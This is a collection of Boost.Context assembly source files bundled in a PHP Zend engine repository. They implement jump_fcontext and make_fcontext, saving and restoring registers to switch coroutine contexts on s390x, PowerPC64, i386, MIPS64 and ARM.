* | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | *
* ------------------------------------------------- *
* | 96 | 104 | 112 | 120 | *
* ------------------------------------------------- *
* | f8 | f9 | f10 | f11 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | *
* ------------------------------------------------- *
* | 128 | 136 | 144 | 152 | *
* ------------------------------------------------- *
* | f12 | f13 | f14 | f15 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | *
* ------------------------------------------------- *
* | 160 | 168 | 176 | | *
* ------------------------------------------------- *
* | fpc | pc | | | *
* ------------------------------------------------- *
*******************************************************/
.text
.align 8
.global jump_fcontext
.type jump_fcontext, @function
#define ARG_OFFSET 0
#define GR_OFFSET 16
#define FP_OFFSET 96
#define FPC_OFFSET 160
#define PC_OFFSET 168
#define CONTEXT_SIZE 176
#define REG_SAVE_AREA_SIZE 160
/*
typedef void* fcontext_t;
struct transfer_t {
fcontext_t fctx;
void * data;
};
transfer_t jump_fcontext( fcontext_t const to,
void * data);
Incoming args
r2 - Hidden argument to the location where the return transfer_t needs to be returned
r3 - Context we want to switch to
r4 - Data pointer
*/
jump_fcontext:
.machine "z10"
/* Reserve stack space to store the current context. */
aghi %r15,-CONTEXT_SIZE
/* Save the argument register holding the location of the return value. */
stg %r2,GR_OFFSET(%r15)
/* Save the call-saved general purpose registers. */
stmg %r6,%r14,GR_OFFSET+8(%r15)
/* Save call-saved floating point registers. */
std %f8,FP_OFFSET(%r15)
std %f9,FP_OFFSET+8(%r15)
std %f10,FP_OFFSET+16(%r15)
std %f11,FP_OFFSET+24(%r15)
std %f12,FP_OFFSET+32(%r15)
std %f13,FP_OFFSET+40(%r15)
std %f14,FP_OFFSET+48(%r15)
std %f15,FP_OFFSET+56(%r15)
/* Save the return address as current pc. */
stg %r14,PC_OFFSET(%r15)
/* Save the floating point control register. */
stfpc FPC_OFFSET(%r15)
/* Backup the stack pointer pointing to the old context-data into r1. */
lgr %r1,%r15
/* Load the new context pointer as stack pointer. */
lgr %r15,%r3
/* Restore the call-saved GPRs from the new context. */
lmg %r6,%r14,GR_OFFSET+8(%r15)
/* Restore call-saved floating point registers. */
ld %f8,FP_OFFSET(%r15)
ld %f9,FP_OFFSET+8(%r15)
ld %f10,FP_OFFSET+16(%r15)
ld %f11,FP_OFFSET+24(%r15)
ld %f12,FP_OFFSET+32(%r15)
ld %f13,FP_OFFSET+40(%r15)
ld %f14,FP_OFFSET+48(%r15)
ld %f15,FP_OFFSET+56(%r15)
/* Load the floating point control register. */
lfpc FPC_OFFSET(%r15)
/* Restore PC - the location where we will jump to at the end. */
lg %r5,PC_OFFSET(%r15)
ltg %r2,GR_OFFSET(%r15)
jnz use_return_slot
/* We restore a make_fcontext context. Use the function
argument slot in the context we just saved and allocate the
register save area for the target function. */
la %r2,ARG_OFFSET(%r1)
aghi %r15,-REG_SAVE_AREA_SIZE
use_return_slot:
/* Save the two fields in transfer_t. When calling a
make_fcontext function this becomes the function argument of
the target function, otherwise it will be the return value of
jump_fcontext. */
stg %r1,0(%r2)
stg %r4,8(%r2)
/* Free the restored context. */
aghi %r15,CONTEXT_SIZE
/* Jump to the PC loaded from the new context. */
br %r5
.size jump_fcontext,.-jump_fcontext
.section .note.GNU-stack,"",%progbits
|
Aidam7/PHavirP
| 5,865
|
Zend/asm/jump_ppc64_sysv_macho_gas.S
|
/*
Copyright Oliver Kowalke 2009.
Distributed under the Boost Software License, Version 1.0.
(See accompanying file LICENSE_1_0.txt or copy at
http://www.boost.org/LICENSE_1_0.txt)
*/
/*******************************************************
* *
* ------------------------------------------------- *
* | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | *
* ------------------------------------------------- *
* | 0 | 4 | 8 | 12 | 16 | 20 | 24 | 28 | *
* ------------------------------------------------- *
* | R13 | R14 | R15 | R16 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | *
* ------------------------------------------------- *
* | 32 | 36 | 40 | 44 | 48 | 52 | 56 | 60 | *
* ------------------------------------------------- *
* | R17 | R18 | R19 | R20 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | *
* ------------------------------------------------- *
* | 64 | 68 | 72 | 76 | 80 | 84 | 88 | 92 | *
* ------------------------------------------------- *
* | R21 | R22 | R23 | R24 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | *
* ------------------------------------------------- *
* | 96 | 100 | 104 | 108 | 112 | 116 | 120 | 124 | *
* ------------------------------------------------- *
* | R25 | R26 | R27 | R28 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | *
* ------------------------------------------------- *
* | 128 | 132 | 136 | 140 | 144 | 148 | 152 | 156 | *
* ------------------------------------------------- *
* | R29 | R30 | R31 | hidden | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | *
* ------------------------------------------------- *
* | 160 | 164 | 168 | 172 | 176 | 180 | 184 | 188 | *
* ------------------------------------------------- *
* | CR | LR | PC | back-chain| *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | *
* ------------------------------------------------- *
* | 192 | 196 | 200 | 204 | 208 | 212 | 216 | 220 | *
* ------------------------------------------------- *
* | cr saved | lr saved | compiler | linker | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | *
* ------------------------------------------------- *
* | 224 | 228 | 232 | 236 | 240 | 244 | 248 | 252 | *
* ------------------------------------------------- *
* | FCTX | DATA | | | *
* ------------------------------------------------- *
* *
*******************************************************/
.text
.align 2
.globl _jump_fcontext
_jump_fcontext:
; reserve space on stack
subi r1, r1, 184
std r14, 8(r1) ; save R14
std r15, 16(r1) ; save R15
std r16, 24(r1) ; save R16
std r17, 32(r1) ; save R17
std r18, 40(r1) ; save R18
std r19, 48(r1) ; save R19
std r20, 56(r1) ; save R20
std r21, 64(r1) ; save R21
std r22, 72(r1) ; save R22
std r23, 80(r1) ; save R23
std r24, 88(r1) ; save R24
std r25, 96(r1) ; save R25
std r26, 104(r1) ; save R26
std r27, 112(r1) ; save R27
std r28, 120(r1) ; save R28
std r29, 128(r1) ; save R29
std r30, 136(r1) ; save R30
std r31, 144(r1) ; save R31
std r3, 152(r1) ; save hidden
; save CR
mfcr r0
std r0, 160(r1)
; save LR
mflr r0
std r0, 168(r1)
; save LR as PC
std r0, 176(r1)
; store RSP (pointing to context-data) in R6
mr r6, r1
; restore RSP (pointing to context-data) from R4
mr r1, r4
ld r14, 8(r1) ; restore R14
ld r15, 16(r1) ; restore R15
ld r16, 24(r1) ; restore R16
ld r17, 32(r1) ; restore R17
ld r18, 40(r1) ; restore R18
ld r19, 48(r1) ; restore R19
ld r20, 56(r1) ; restore R20
ld r21, 64(r1) ; restore R21
ld r22, 72(r1) ; restore R22
ld r23, 80(r1) ; restore R23
ld r24, 88(r1) ; restore R24
ld r25, 96(r1) ; restore R25
ld r26, 104(r1) ; restore R26
ld r27, 112(r1) ; restore R27
ld r28, 120(r1) ; restore R28
ld r29, 128(r1) ; restore R29
ld r30, 136(r1) ; restore R30
ld r31, 144(r1) ; restore R31
ld r3, 152(r1) ; restore hidden
; restore CR
ld r0, 160(r1)
mtcr r0
; restore LR
ld r0, 168(r1)
mtlr r0
; load PC
ld r12, 176(r1)
; restore CTR
mtctr r12
; adjust stack
addi r1, r1, 184
; zero in r3 indicates first jump to context-function
cmpdi r3, 0
beq use_entry_arg
; return transfer_t
std r6, 0(r3)
std r5, 8(r3)
; jump to context
bctr
use_entry_arg:
; copy transfer_t into transfer_fn arg registers
mr r3, r6
mr r4, r5
; jump to context
bctr
|
Aidam7/PHavirP
| 4,275
|
Zend/asm/make_i386_sysv_elf_gas.S
|
/*
Copyright Oliver Kowalke 2009.
Distributed under the Boost Software License, Version 1.0.
(See accompanying file LICENSE_1_0.txt or copy at
http://www.boost.org/LICENSE_1_0.txt)
*/
/****************************************************************************************
* *
* ---------------------------------------------------------------------------------- *
* | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | *
* ---------------------------------------------------------------------------------- *
* | 0x0 | 0x4 | 0x8 | 0xc | 0x10 | 0x14 | 0x18 | 0x1c | *
* ---------------------------------------------------------------------------------- *
* | fc_mxcsr|fc_x87_cw| guard | EDI | ESI | EBX | EBP | EIP | *
* ---------------------------------------------------------------------------------- *
* ---------------------------------------------------------------------------------- *
* | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | *
* ---------------------------------------------------------------------------------- *
* | 0x20 | 0x24 | 0x28 | | *
* ---------------------------------------------------------------------------------- *
* | hidden | to | data | | *
* ---------------------------------------------------------------------------------- *
* *
****************************************************************************************/
.file "make_i386_sysv_elf_gas.S"
.text
.globl make_fcontext
.align 2
.type make_fcontext,@function
make_fcontext:
/* first arg of make_fcontext() == top of context-stack */
movl 0x4(%esp), %eax
/* reserve space for first argument of context-function
eax might already point to a 16byte border */
leal -0x8(%eax), %eax
/* shift address in EAX to lower 16 byte boundary */
andl $-16, %eax
/* reserve space for context-data on context-stack, and align the stack */
leal -0x34(%eax), %eax
/* third arg of make_fcontext() == address of context-function */
/* stored in EBX */
movl 0xc(%esp), %ecx
movl %ecx, 0x14(%eax)
/* save MMX control- and status-word */
stmxcsr (%eax)
/* save x87 control-word */
fnstcw 0x4(%eax)
#if defined(BOOST_CONTEXT_TLS_STACK_PROTECTOR)
/* save stack guard */
movl %gs:0x14, %ecx /* read stack guard from TLS record */
movl %ecx, 0x8(%eax) /* save stack guard */
#endif
/* return transport_t */
/* FCTX == EDI, DATA == ESI */
leal 0xc(%eax), %ecx
movl %ecx, 0x20(%eax)
/* compute abs address of label trampoline */
call 1f
/* address of trampoline 1 */
1: popl %ecx
/* compute abs address of label trampoline */
addl $trampoline-1b, %ecx
/* save address of trampoline as return address */
/* will be entered after calling jump_fcontext() first time */
movl %ecx, 0x1c(%eax)
/* compute abs address of label finish */
call 2f
/* address of label 2 */
2: popl %ecx
/* compute abs address of label finish */
addl $finish-2b, %ecx
/* save address of finish as return-address for context-function */
/* will be entered after context-function returns */
movl %ecx, 0x18(%eax)
ret /* return pointer to context-data */
trampoline:
/* move transport_t for entering context-function */
movl %edi, (%esp)
movl %esi, 0x4(%esp)
pushl %ebp
/* jump to context-function */
jmp *%ebx
finish:
call 3f
/* address of label 3 */
3: popl %ebx
/* compute address of GOT and store it in EBX */
addl $_GLOBAL_OFFSET_TABLE_+[.-3b], %ebx
/* exit code is zero */
xorl %eax, %eax
movl %eax, (%esp)
/* exit application */
call _exit@PLT
hlt
.size make_fcontext,.-make_fcontext
/* Mark that we don't need executable stack. */
.section .note.GNU-stack,"",%progbits
|
Aidam7/PHavirP
| 4,534
|
Zend/asm/jump_mips64_n64_elf_gas.S
|
/*
Copyright Jiaxun Yang 2018.
Distributed under the Boost Software License, Version 1.0.
(See accompanying file LICENSE_1_0.txt or copy at
http://www.boost.org/LICENSE_1_0.txt)
*/
/*******************************************************
* *
* ------------------------------------------------- *
* | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | *
* ------------------------------------------------- *
* | 0 | 8 | 16 | 24 | *
* ------------------------------------------------- *
* | F24 | F25 | F26 | F27 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | *
* ------------------------------------------------- *
* | 32 | 40 | 48 | 56 | *
* ------------------------------------------------- *
* | F28 | F29 | F30 | F31 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | *
* ------------------------------------------------- *
* | 64 | 72 | 80 | 88 | *
* ------------------------------------------------- *
* | S0 | S1 | S2 | S3 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | *
* ------------------------------------------------- *
* | 96 | 100 | 104 | 108 | 112 | 116 | 120 | 124 | *
* ------------------------------------------------- *
* | S4 | S5 | S6 | S7 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | *
* ------------------------------------------------- *
* | 128 | 132 | 136 | 140 | 144 | 148 | 152 | 156 | *
* ------------------------------------------------- *
* | FP | GP | RA | PC | *
* ------------------------------------------------- *
* *
* *****************************************************/
.file "jump_mips64_n64_elf_gas.S"
.text
.globl jump_fcontext
.align 3
.type jump_fcontext,@function
.ent jump_fcontext
jump_fcontext:
# reserve space on stack
daddiu $sp, $sp, -160
sd $s0, 64($sp) # save S0
sd $s1, 72($sp) # save S1
sd $s2, 80($sp) # save S2
sd $s3, 88($sp) # save S3
sd $s4, 96($sp) # save S4
sd $s5, 104($sp) # save S5
sd $s6, 112($sp) # save S6
sd $s7, 120($sp) # save S7
sd $fp, 128($sp) # save FP
sd $ra, 144($sp) # save RA
sd $ra, 152($sp) # save RA as PC
#if defined(__mips_hard_float)
s.d $f24, 0($sp) # save F24
s.d $f25, 8($sp) # save F25
s.d $f26, 16($sp) # save F26
s.d $f27, 24($sp) # save F27
s.d $f28, 32($sp) # save F28
s.d $f29, 40($sp) # save F29
s.d $f30, 48($sp) # save F30
s.d $f31, 56($sp) # save F31
#endif
# store SP (pointing to old context-data) in v0 as return
move $v0, $sp
# get SP (pointing to new context-data) from a0 param
move $sp, $a0
#if defined(__mips_hard_float)
l.d $f24, 0($sp) # restore F24
l.d $f25, 8($sp) # restore F25
l.d $f26, 16($sp) # restore F26
l.d $f27, 24($sp) # restore F27
l.d $f28, 32($sp) # restore F28
l.d $f29, 40($sp) # restore F29
l.d $f30, 48($sp) # restore F30
l.d $f31, 56($sp) # restore F31
#endif
ld $s0, 64($sp) # restore S0
ld $s1, 72($sp) # restore S1
ld $s2, 80($sp) # restore S2
ld $s3, 88($sp) # restore S3
ld $s4, 96($sp) # restore S4
ld $s5, 104($sp) # restore S5
ld $s6, 112($sp) # restore S6
ld $s7, 120($sp) # restore S7
ld $fp, 128($sp) # restore FP
ld $ra, 144($sp) # restore RAa
# load PC
ld $t9, 152($sp)
# adjust stack
daddiu $sp, $sp, 160
move $a0, $v0 # move old sp from v0 to a0 as param
move $v1, $a1 # move *data from a1 to v1 as return
# jump to context
jr $t9
.end jump_fcontext
.size jump_fcontext, .-jump_fcontext
/* Mark that we don't need executable stack. */
.section .note.GNU-stack,"",%progbits
|
Aidam7/PHavirP
| 3,181
|
Zend/asm/jump_i386_sysv_macho_gas.S
|
/*
Copyright Oliver Kowalke 2009.
Distributed under the Boost Software License, Version 1.0.
(See accompanying file LICENSE_1_0.txt or copy at
http://www.boost.org/LICENSE_1_0.txt)
*/
/****************************************************************************************
* *
* ---------------------------------------------------------------------------------- *
* | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | *
* ---------------------------------------------------------------------------------- *
* | 0x0 | 0x4 | 0x8 | 0xc | 0x10 | 0x14 | 0x18 | 0x1c | *
* ---------------------------------------------------------------------------------- *
* | fc_mxcsr|fc_x87_cw| EDI | ESI | EBX | EBP | EIP | to | *
* ---------------------------------------------------------------------------------- *
* ---------------------------------------------------------------------------------- *
* | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | *
* ---------------------------------------------------------------------------------- *
* | 0x20 | | *
* ---------------------------------------------------------------------------------- *
* | data | | *
* ---------------------------------------------------------------------------------- *
* *
****************************************************************************************/
.text
.globl _jump_fcontext
.align 2
_jump_fcontext:
leal -0x18(%esp), %esp /* prepare stack */
#if !defined(BOOST_USE_TSX)
stmxcsr (%esp) /* save MMX control- and status-word */
fnstcw 0x4(%esp) /* save x87 control-word */
#endif
movl %edi, 0x8(%esp) /* save EDI */
movl %esi, 0xc(%esp) /* save ESI */
movl %ebx, 0x10(%esp) /* save EBX */
movl %ebp, 0x14(%esp) /* save EBP */
/* store ESP (pointing to context-data) in ECX */
movl %esp, %ecx
/* first arg of jump_fcontext() == fcontext to jump to */
movl 0x1c(%esp), %eax
/* second arg of jump_fcontext() == data to be transferred */
movl 0x20(%esp), %edx
/* restore ESP (pointing to context-data) from EAX */
movl %eax, %esp
/* return parent fcontext_t */
movl %ecx, %eax
/* returned data is stored in EDX */
movl 0x18(%esp), %ecx /* restore EIP */
#if !defined(BOOST_USE_TSX)
ldmxcsr (%esp) /* restore MMX control- and status-word */
fldcw 0x4(%esp) /* restore x87 control-word */
#endif
movl 0x8(%esp), %edi /* restore EDI */
movl 0xc(%esp), %esi /* restore ESI */
movl 0x10(%esp), %ebx /* restore EBX */
movl 0x14(%esp), %ebp /* restore EBP */
leal 0x1c(%esp), %esp /* prepare stack */
/* jump to context */
jmp *%ecx
|
Aidam7/PHavirP
| 3,078
|
Zend/asm/jump_arm_aapcs_elf_gas.S
|
/*
Copyright Oliver Kowalke 2009.
Distributed under the Boost Software License, Version 1.0.
(See accompanying file LICENSE_1_0.txt or copy at
http://www.boost.org/LICENSE_1_0.txt)
*/
/*******************************************************
* *
* ------------------------------------------------- *
* | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | *
* ------------------------------------------------- *
* | 0x0 | 0x4 | 0x8 | 0xc | 0x10| 0x14| 0x18| 0x1c| *
* ------------------------------------------------- *
* | s16 | s17 | s18 | s19 | s20 | s21 | s22 | s23 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | *
* ------------------------------------------------- *
* | 0x20| 0x24| 0x28| 0x2c| 0x30| 0x34| 0x38| 0x3c| *
* ------------------------------------------------- *
* | s24 | s25 | s26 | s27 | s28 | s29 | s30 | s31 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | *
* ------------------------------------------------- *
* | 0x40| 0x44| 0x48| 0x4c| 0x50| 0x54| 0x58| 0x5c| *
* ------------------------------------------------- *
* |hiddn| v1 | v2 | v3 | v4 | v5 | v6 | v7 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | *
* ------------------------------------------------- *
* | 0x60| 0x64| 0x68| 0x6c| 0x70| 0x74| 0x78| 0x7c| *
* ------------------------------------------------- *
* | v8 | lr | pc | FCTX| DATA| | *
* ------------------------------------------------- *
* *
*******************************************************/
.file "jump_arm_aapcs_elf_gas.S"
.text
.globl jump_fcontext
.align 2
.type jump_fcontext,%function
.syntax unified
jump_fcontext:
@ save LR as PC
push {lr}
@ save hidden,V1-V8,LR
push {a1,v1-v8,lr}
@ prepare stack for FPU
sub sp, sp, #64
#if (defined(__VFP_FP__) && !defined(__SOFTFP__))
@ save S16-S31
vstmia sp, {d8-d15}
#endif
@ store RSP (pointing to context-data) in A1
mov a1, sp
@ restore RSP (pointing to context-data) from A2
mov sp, a2
#if (defined(__VFP_FP__) && !defined(__SOFTFP__))
@ restore S16-S31
vldmia sp, {d8-d15}
#endif
@ prepare stack for FPU
add sp, sp, #64
@ restore hidden,V1-V8,LR
pop {a4,v1-v8,lr}
@ return transfer_t from jump
str a1, [a4, #0]
str a3, [a4, #4]
@ pass transfer_t as first arg in context function
@ A1 == FCTX, A2 == DATA
mov a2, a3
@ restore PC
pop {pc}
.size jump_fcontext,.-jump_fcontext
@ Mark that we don't need executable stack.
.section .note.GNU-stack,"",%progbits
|
Aidam7/PHavirP
| 3,191
|
Zend/asm/jump_arm_aapcs_macho_gas.S
|
/*
Copyright Oliver Kowalke 2009.
Distributed under the Boost Software License, Version 1.0.
(See accompanying file LICENSE_1_0.txt or copy at
http://www.boost.org/LICENSE_1_0.txt)
*/
/*******************************************************
* *
* ------------------------------------------------- *
* | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | *
* ------------------------------------------------- *
* | 0x0 | 0x4 | 0x8 | 0xc | 0x10| 0x14| 0x18| 0x1c| *
* ------------------------------------------------- *
* | s16 | s17 | s18 | s19 | s20 | s21 | s22 | s23 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | *
* ------------------------------------------------- *
* | 0x20| 0x24| 0x28| 0x2c| 0x30| 0x34| 0x38| 0x3c| *
* ------------------------------------------------- *
* | s24 | s25 | s26 | s27 | s28 | s29 | s30 | s31 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | *
* ------------------------------------------------- *
* | 0x0 | 0x4 | 0x8 | 0xc | 0x10| 0x14| 0x18| 0x1c| *
* ------------------------------------------------- *
* | sjlj|hiddn| v1 | v2 | v3 | v4 | v5 | v6 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | *
* ------------------------------------------------- *
* | 0x20| 0x24| 0x28| 0x2c| 0x30| 0x34| 0x38| 0x3c| *
* ------------------------------------------------- *
* | v7 | v8 | lr | pc | FCTX| DATA| | *
* ------------------------------------------------- *
* *
*******************************************************/
.text
.globl _jump_fcontext
.align 2
_jump_fcontext:
@ save LR as PC
push {lr}
@ save hidden,V1-V8,LR
push {a1,v1-v8,lr}
@ locate TLS to save/restore SjLj handler
mrc p15, 0, v2, c13, c0, #3
bic v2, v2, #3
@ load TLS[__PTK_LIBC_DYLD_Unwind_SjLj_Key]
ldr v1, [v2, #72]
@ save SjLj handler
push {v1}
@ prepare stack for FPU
sub sp, sp, #64
#if (defined(__VFP_FP__) && !defined(__SOFTFP__))
@ save S16-S31
vstmia sp, {d8-d15}
#endif
@ store RSP (pointing to context-data) in A1
mov a1, sp
@ restore RSP (pointing to context-data) from A2
mov sp, a2
#if (defined(__VFP_FP__) && !defined(__SOFTFP__))
@ restore S16-S31
vldmia sp, {d8-d15}
#endif
@ prepare stack for FPU
add sp, sp, #64
@ r#estore SjLj handler
pop {v1}
@ store SjLj handler in TLS
str v1, [v2, #72]
@ restore hidden,V1-V8,LR
pop {a4,v1-v8,lr}
@ return transfer_t from jump
str a1, [a4, #0]
str a3, [a4, #4]
@ pass transfer_t as first arg in context function
@ A1 == FCTX, A2 == DATA
mov a2, a3
@ restore PC
pop {pc}
|
Aidam7/PHavirP
| 5,289
|
Zend/asm/make_ppc64_sysv_xcoff_gas.S
|
/*
Copyright Oliver Kowalke 2009.
Distributed under the Boost Software License, Version 1.0.
(See accompanying file LICENSE_1_0.txt or copy at
http://www.boost.org/LICENSE_1_0.txt)
*/
/*******************************************************
* *
* ------------------------------------------------- *
* | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | *
* ------------------------------------------------- *
* | 0 | 4 | 8 | 12 | 16 | 20 | 24 | 28 | *
* ------------------------------------------------- *
* | TOC | R14 | R15 | R16 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | *
* ------------------------------------------------- *
* | 32 | 36 | 40 | 44 | 48 | 52 | 56 | 60 | *
* ------------------------------------------------- *
* | R17 | R18 | R19 | R20 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | *
* ------------------------------------------------- *
* | 64 | 68 | 72 | 76 | 80 | 84 | 88 | 92 | *
* ------------------------------------------------- *
* | R21 | R22 | R23 | R24 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | *
* ------------------------------------------------- *
* | 96 | 100 | 104 | 108 | 112 | 116 | 120 | 124 | *
* ------------------------------------------------- *
* | R25 | R26 | R27 | R28 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | *
* ------------------------------------------------- *
* | 128 | 132 | 136 | 140 | 144 | 148 | 152 | 156 | *
* ------------------------------------------------- *
* | R29 | R30 | R31 | hidden | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | *
* ------------------------------------------------- *
* | 160 | 164 | 168 | 172 | 176 | 180 | 184 | 188 | *
* ------------------------------------------------- *
* | CR | LR | PC | back-chain| *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | *
* ------------------------------------------------- *
* | 192 | 196 | 200 | 204 | 208 | 212 | 216 | 220 | *
* ------------------------------------------------- *
* | cr saved | lr saved | compiler | linker | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | *
* ------------------------------------------------- *
* | 224 | 228 | 232 | 236 | 240 | 244 | 248 | 252 | *
* ------------------------------------------------- *
* | TOC saved | FCTX | DATA | | *
* ------------------------------------------------- *
* *
*******************************************************/
.file "make_ppc64_sysv_xcoff_gas.S"
.toc
.csect .text[PR], 5
.align 2
.globl make_fcontext[DS]
.globl .make_fcontext
.csect make_fcontext[DS], 3
make_fcontext:
.llong .make_fcontext[PR], TOC[tc0], 0
.csect .text[PR], 5
.make_fcontext:
# save return address into R6
mflr 6
# first arg of make_fcontext() == top address of context-function
# shift address in R3 to lower 16 byte boundary
clrrdi 3, 3, 4
# reserve space for context-data on context-stack
# including 64 byte of linkage + parameter area (R1 % 16 == 0)
subi 3, 3, 248
# third arg of make_fcontext() == address of context-function descriptor
ld 4, 0(5)
std 4, 176(3)
# save TOC of context-function
ld 4, 8(5)
std 4, 0(3)
# set back-chain to zero
li 0, 0
std 0, 184(3)
# zero in r3 indicates first jump to context-function
std 0, 152(3)
# load LR
mflr 0
# jump to label 1
bl .Label
.Label:
# load LR into R4
mflr 4
# compute abs address of label .L_finish
addi 4, 4, .L_finish - .Label
# restore LR
mtlr 0
# save address of finish as return-address for context-function
# will be entered after context-function returns
std 4, 168(3)
# restore return address from R6
mtlr 6
blr # return pointer to context-data
.L_finish:
# save return address into R0
mflr 0
# save return address on stack, set up stack frame
std 0, 8(1)
# allocate stack space, R1 % 16 == 0
stdu 1, -32(1)
# exit code is zero
li 3, 0
# exit application
bl ._exit
nop
|
Aidam7/PHavirP
| 7,302
|
Zend/asm/jump_ppc64_sysv_elf_gas.S
|
/*
Copyright Oliver Kowalke 2009.
Distributed under the Boost Software License, Version 1.0.
(See accompanying file LICENSE_1_0.txt or copy at
http://www.boost.org/LICENSE_1_0.txt)
*/
/*******************************************************
* *
* ------------------------------------------------- *
* | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | *
* ------------------------------------------------- *
* | 0 | 4 | 8 | 12 | 16 | 20 | 24 | 28 | *
* ------------------------------------------------- *
* | TOC | R14 | R15 | R16 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | *
* ------------------------------------------------- *
* | 32 | 36 | 40 | 44 | 48 | 52 | 56 | 60 | *
* ------------------------------------------------- *
* | R17 | R18 | R19 | R20 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | *
* ------------------------------------------------- *
* | 64 | 68 | 72 | 76 | 80 | 84 | 88 | 92 | *
* ------------------------------------------------- *
* | R21 | R22 | R23 | R24 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | *
* ------------------------------------------------- *
* | 96 | 100 | 104 | 108 | 112 | 116 | 120 | 124 | *
* ------------------------------------------------- *
* | R25 | R26 | R27 | R28 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | *
* ------------------------------------------------- *
* | 128 | 132 | 136 | 140 | 144 | 148 | 152 | 156 | *
* ------------------------------------------------- *
* | R29 | R30 | R31 | hidden | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | *
* ------------------------------------------------- *
* | 160 | 164 | 168 | 172 | 176 | 180 | 184 | 188 | *
* ------------------------------------------------- *
* | CR | LR | PC | back-chain| *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | *
* ------------------------------------------------- *
* | 192 | 196 | 200 | 204 | 208 | 212 | 216 | 220 | *
* ------------------------------------------------- *
* | cr saved | lr saved | compiler | linker | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | *
* ------------------------------------------------- *
* | 224 | 228 | 232 | 236 | 240 | 244 | 248 | 252 | *
* ------------------------------------------------- *
* | TOC saved | FCTX | DATA | | *
* ------------------------------------------------- *
* *
*******************************************************/
.file "jump_ppc64_sysv_elf_gas.S"
.globl jump_fcontext
#if _CALL_ELF == 2
.text
.align 2
jump_fcontext:
addis %r2, %r12, .TOC.-jump_fcontext@ha
addi %r2, %r2, .TOC.-jump_fcontext@l
.localentry jump_fcontext, . - jump_fcontext
#else
.section ".opd","aw"
.align 3
jump_fcontext:
# ifdef _CALL_LINUX
.quad .L.jump_fcontext,.TOC.@tocbase,0
.type jump_fcontext,@function
.text
.align 2
.L.jump_fcontext:
# else
.hidden .jump_fcontext
.globl .jump_fcontext
.quad .jump_fcontext,.TOC.@tocbase,0
.size jump_fcontext,24
.type .jump_fcontext,@function
.text
.align 2
